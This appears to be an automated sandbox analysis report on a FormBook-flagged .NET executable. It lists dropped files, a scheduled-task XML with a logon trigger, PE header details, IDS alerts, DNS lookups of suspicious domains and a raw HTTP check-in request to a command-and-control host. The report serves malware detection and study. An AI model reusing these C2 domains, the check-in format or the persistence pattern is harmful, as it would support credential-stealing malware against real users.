SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hsaurdy.f4g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfqqjebp.dkc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmwoz1io.f1e.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp89CA.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.1032305129953714
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL/xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTdv
MD5:	19B52953B4AA8ADD30C14346081CCB63
SHA1:	ECB68B30551AF606C8BF014A0495EE800E4AE540
SHA-256:	973C9C63852F70930AA05E4400F461995A2FED85FB02D2183F428EF2D54E812C
SHA-512:	65EC88ECEC33566ED98387E63096C5D80375830E8DA3AC1FE0B2789E571EE76A82BAA9C9F4A671ECEA9698E32800CB441DB5C094FB088F45A78B6247FBE05F06
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp9563.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.1032305129953714
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL/xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTdv
MD5:	19B52953B4AA8ADD30C14346081CCB63
SHA1:	ECB68B30551AF606C8BF014A0495EE800E4AE540
SHA-256:	973C9C63852F70930AA05E4400F461995A2FED85FB02D2183F428EF2D54E812C
SHA-512:	65EC88ECEC33566ED98387E63096C5D80375830E8DA3AC1FE0B2789E571EE76A82BAA9C9F4A671ECEA9698E32800CB441DB5C094FB088F45A78B6247FBE05F06
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	574976
Entropy (8bit):	7.971463918745116
Encrypted:	false
SSDEEP:	12288:0MHalYsHfne1TDq/MrmqiqaXpSxDHjFB0LobIgySCq:Jaltve1TmUvir4zZuLobSSF
MD5:	01FBCC6559C010E59BE1DC7B66C12E4F
SHA1:	657F058D4032447658F71265803F7A6D52A64532
SHA-256:	EE7DD9158F6175700AA6D58F346036F949889F8DEEBF8DBEE83C40874BBC1F26
SHA-512:	8D83EEA254360B6FCBB2A83EF6A6D26898A2370C151CDD36FC964509B27B4E5241EBFF1D520D6BFB194CE14589C51D2387023ECE6858C6A8E6A7634F7418FDCC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...hK.f..............0.............F.... ........@.. ....................... ............@.....................................O...................................\|...T............................................ ............... ..H............text...L.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................(.......H........B...=..........\... @..........................................^..}.....(.......(......0../........(...........s....o...........s.... ....o.......0............r...po......,..(...+...+....,....o.....+S.o............+7............(........( ..........,.........&........X.......i2...+........C.#f........{...."..}........0..G.........(!.....,$........s".........%...P....(#...&+....-..+..($.....(%.......0..+.........,..{.......+....,...{....o&.......('....*..0......

C:\Users\user\AppData\Roaming\KfYvtUBOq.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.971463918745116
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
File size:	574'976 bytes
MD5:	01fbcc6559c010e59be1dc7b66c12e4f
SHA1:	657f058d4032447658f71265803f7a6d52a64532
SHA256:	ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26
SHA512:	8d83eea254360b6fcbb2a83ef6a6d26898a2370c151cdd36fc964509b27b4e5241ebff1d520d6bfb194ce14589c51d2387023ece6858c6a8e6a7634f7418fdcc
SSDEEP:	12288:0MHalYsHfne1TDq/MrmqiqaXpSxDHjFB0LobIgySCq:Jaltve1TmUvir4zZuLobSSF
TLSH:	15C42311279AC735C13F533F9A218E8016BE60A9BCF6DB297D8924B95F7339049235CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...hK.f..............0.............F.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x48da46
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A34B68 [Fri Jul 26 07:08:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d9f4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8e000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x90000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8c07c	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8ba4c	0x8bc00	afce81c5b7ab7467b7f15086eddab1b6	False	0.9726859486806798	data	7.977493198205763	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8e000	0x5ac	0x600	7f491ea55333e79297d20159cbfe6ff9	False	0.4231770833333333	data	4.093401657462278	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x90000	0xc	0x200	414b2625fdd014801604842c1ea05ada	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8e090	0x31c	data			0.43467336683417085
RT_MANIFEST	0x8e3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T12:46:10.799436+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49727	80	192.168.2.6	3.33.130.190
2024-07-26T12:47:32.905145+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49731	80	192.168.2.6	103.224.182.210
2024-07-26T12:44:50.531397+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49733	80	192.168.2.6	167.172.226.170
2024-07-26T12:47:12.529661+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49730	80	192.168.2.6	194.41.37.230
2024-07-26T12:45:11.821005+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49717	20.12.23.50	192.168.2.6
2024-07-26T12:45:30.130961+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49722	80	192.168.2.6	172.67.134.182
2024-07-26T12:49:03.282016+0200	TCP	2031453	ET MALWARE FormBook CnC Checkin (GET)	49735	80	192.168.2.6	3.64.163.50
2024-07-26T12:45:49.076540+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49724	20.12.23.50	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 12:45:29.628093958 CEST	49722	80	192.168.2.6	172.67.134.182
Jul 26, 2024 12:45:29.633177042 CEST	80	49722	172.67.134.182	192.168.2.6
Jul 26, 2024 12:45:29.633264065 CEST	49722	80	192.168.2.6	172.67.134.182
Jul 26, 2024 12:45:29.633332014 CEST	49722	80	192.168.2.6	172.67.134.182
Jul 26, 2024 12:45:29.638317108 CEST	80	49722	172.67.134.182	192.168.2.6
Jul 26, 2024 12:45:30.125494003 CEST	49722	80	192.168.2.6	172.67.134.182
Jul 26, 2024 12:45:30.130877018 CEST	80	49722	172.67.134.182	192.168.2.6
Jul 26, 2024 12:45:30.130960941 CEST	49722	80	192.168.2.6	172.67.134.182
Jul 26, 2024 12:45:49.906874895 CEST	49725	80	192.168.2.6	157.53.227.1
Jul 26, 2024 12:45:49.911802053 CEST	80	49725	157.53.227.1	192.168.2.6
Jul 26, 2024 12:45:49.914335966 CEST	49725	80	192.168.2.6	157.53.227.1
Jul 26, 2024 12:45:49.914392948 CEST	49725	80	192.168.2.6	157.53.227.1
Jul 26, 2024 12:45:49.919301033 CEST	80	49725	157.53.227.1	192.168.2.6
Jul 26, 2024 12:45:50.371421099 CEST	80	49725	157.53.227.1	192.168.2.6
Jul 26, 2024 12:45:50.371450901 CEST	80	49725	157.53.227.1	192.168.2.6
Jul 26, 2024 12:45:50.371682882 CEST	49725	80	192.168.2.6	157.53.227.1
Jul 26, 2024 12:45:50.371783972 CEST	49725	80	192.168.2.6	157.53.227.1
Jul 26, 2024 12:45:50.376815081 CEST	80	49725	157.53.227.1	192.168.2.6
Jul 26, 2024 12:46:10.315968037 CEST	49727	80	192.168.2.6	3.33.130.190
Jul 26, 2024 12:46:10.321984053 CEST	80	49727	3.33.130.190	192.168.2.6
Jul 26, 2024 12:46:10.322066069 CEST	49727	80	192.168.2.6	3.33.130.190
Jul 26, 2024 12:46:10.322123051 CEST	49727	80	192.168.2.6	3.33.130.190
Jul 26, 2024 12:46:10.329150915 CEST	80	49727	3.33.130.190	192.168.2.6
Jul 26, 2024 12:46:10.798499107 CEST	80	49727	3.33.130.190	192.168.2.6
Jul 26, 2024 12:46:10.798630953 CEST	49727	80	192.168.2.6	3.33.130.190
Jul 26, 2024 12:46:10.799393892 CEST	80	49727	3.33.130.190	192.168.2.6
Jul 26, 2024 12:46:10.799436092 CEST	49727	80	192.168.2.6	3.33.130.190
Jul 26, 2024 12:46:10.808794022 CEST	80	49727	3.33.130.190	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 12:45:29.611412048 CEST	53966	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:45:29.627501965 CEST	53	53966	1.1.1.1	192.168.2.6
Jul 26, 2024 12:45:49.891568899 CEST	65135	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:45:49.905291080 CEST	53	65135	1.1.1.1	192.168.2.6
Jul 26, 2024 12:46:10.297995090 CEST	51449	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:46:10.315377951 CEST	53	51449	1.1.1.1	192.168.2.6
Jul 26, 2024 12:46:30.664886951 CEST	50225	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:46:30.690344095 CEST	53	50225	1.1.1.1	192.168.2.6
Jul 26, 2024 12:46:51.063682079 CEST	50466	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:46:51.299125910 CEST	53	50466	1.1.1.1	192.168.2.6
Jul 26, 2024 12:47:11.501912117 CEST	59767	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:47:11.924628973 CEST	53	59767	1.1.1.1	192.168.2.6
Jul 26, 2024 12:47:32.049662113 CEST	56288	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:47:32.369867086 CEST	53	56288	1.1.1.1	192.168.2.6
Jul 26, 2024 12:47:52.471693993 CEST	52091	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:47:52.634221077 CEST	53	52091	1.1.1.1	192.168.2.6
Jul 26, 2024 12:48:12.881972075 CEST	58571	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:48:13.879024982 CEST	58571	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:48:13.955763102 CEST	53	58571	1.1.1.1	192.168.2.6
Jul 26, 2024 12:48:13.961312056 CEST	53	58571	1.1.1.1	192.168.2.6
Jul 26, 2024 12:48:33.396048069 CEST	49253	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:48:33.423855066 CEST	53	49253	1.1.1.1	192.168.2.6
Jul 26, 2024 12:48:53.770632029 CEST	56444	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:48:53.785069942 CEST	53	56444	1.1.1.1	192.168.2.6
Jul 26, 2024 12:49:14.907871008 CEST	65433	53	192.168.2.6	1.1.1.1
Jul 26, 2024 12:49:14.926754951 CEST	53	65433	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 26, 2024 12:45:29.611412048 CEST	192.168.2.6	1.1.1.1	0xadca	Standard query (0)	www.dandevonald.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:45:49.891568899 CEST	192.168.2.6	1.1.1.1	0x11c7	Standard query (0)	www.carmen-asa.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:10.297995090 CEST	192.168.2.6	1.1.1.1	0x92be	Standard query (0)	www.rs-alohafactorysaleuua.shop	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:30.664886951 CEST	192.168.2.6	1.1.1.1	0xb654	Standard query (0)	www.tqqft8l5.xyz	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:51.063682079 CEST	192.168.2.6	1.1.1.1	0x7c7b	Standard query (0)	www.jwoalhbn.xyz	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.501912117 CEST	192.168.2.6	1.1.1.1	0x97e7	Standard query (0)	www.99812.photos	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:32.049662113 CEST	192.168.2.6	1.1.1.1	0xad37	Standard query (0)	www.20allhen.online	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:52.471693993 CEST	192.168.2.6	1.1.1.1	0xc909	Standard query (0)	www.ttyijlaw.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:12.881972075 CEST	192.168.2.6	1.1.1.1	0x56fa	Standard query (0)	www.incrediblyxb.christmas	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:13.879024982 CEST	192.168.2.6	1.1.1.1	0x56fa	Standard query (0)	www.incrediblyxb.christmas	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:33.396048069 CEST	192.168.2.6	1.1.1.1	0xac96	Standard query (0)	www.dunia188j.store	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:53.770632029 CEST	192.168.2.6	1.1.1.1	0xc5e9	Standard query (0)	www.midsouthhealthcare.com	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:49:14.907871008 CEST	192.168.2.6	1.1.1.1	0x9885	Standard query (0)	www.286live.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 26, 2024 12:45:29.627501965 CEST	1.1.1.1	192.168.2.6	0xadca	No error (0)	www.dandevonald.com		172.67.134.182	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:45:29.627501965 CEST	1.1.1.1	192.168.2.6	0xadca	No error (0)	www.dandevonald.com		104.21.6.102	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:45:49.905291080 CEST	1.1.1.1	192.168.2.6	0x11c7	No error (0)	www.carmen-asa.com		157.53.227.1	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:10.315377951 CEST	1.1.1.1	192.168.2.6	0x92be	No error (0)	www.rs-alohafactorysaleuua.shop	rs-alohafactorysaleuua.shop		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 12:46:10.315377951 CEST	1.1.1.1	192.168.2.6	0x92be	No error (0)	rs-alohafactorysaleuua.shop		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:10.315377951 CEST	1.1.1.1	192.168.2.6	0x92be	No error (0)	rs-alohafactorysaleuua.shop		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:30.690344095 CEST	1.1.1.1	192.168.2.6	0xb654	Name error (3)	www.tqqft8l5.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:46:51.299125910 CEST	1.1.1.1	192.168.2.6	0x7c7b	Name error (3)	www.jwoalhbn.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	www.99812.photos	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		194.41.37.230	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		194.41.37.233	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		194.41.37.235	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		194.41.37.234	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		194.41.37.232	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:11.924628973 CEST	1.1.1.1	192.168.2.6	0x97e7	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		194.41.37.236	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:32.369867086 CEST	1.1.1.1	192.168.2.6	0xad37	No error (0)	www.20allhen.online		103.224.182.210	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:47:52.634221077 CEST	1.1.1.1	192.168.2.6	0xc909	Server failure (2)	www.ttyijlaw.com	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:13.955763102 CEST	1.1.1.1	192.168.2.6	0x56fa	No error (0)	www.incrediblyxb.christmas		167.172.226.170	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:13.961312056 CEST	1.1.1.1	192.168.2.6	0x56fa	No error (0)	www.incrediblyxb.christmas		167.172.226.170	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:33.423855066 CEST	1.1.1.1	192.168.2.6	0xac96	Server failure (2)	www.dunia188j.store	none	none	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:48:53.785069942 CEST	1.1.1.1	192.168.2.6	0xc5e9	No error (0)	www.midsouthhealthcare.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Jul 26, 2024 12:49:14.926754951 CEST	1.1.1.1	192.168.2.6	0x9885	No error (0)	www.286live.com	286live.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 26, 2024 12:49:14.926754951 CEST	1.1.1.1	192.168.2.6	0x9885	No error (0)	286live.com		206.233.130.31	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dandevonald.com

www.carmen-asa.com

www.rs-alohafactorysaleuua.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49722	172.67.134.182	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:45:29.633332014 CEST	174	OUT	GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1 Host: www.dandevonald.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49725	157.53.227.1	80	4004	C:\Windows\explorer.exe

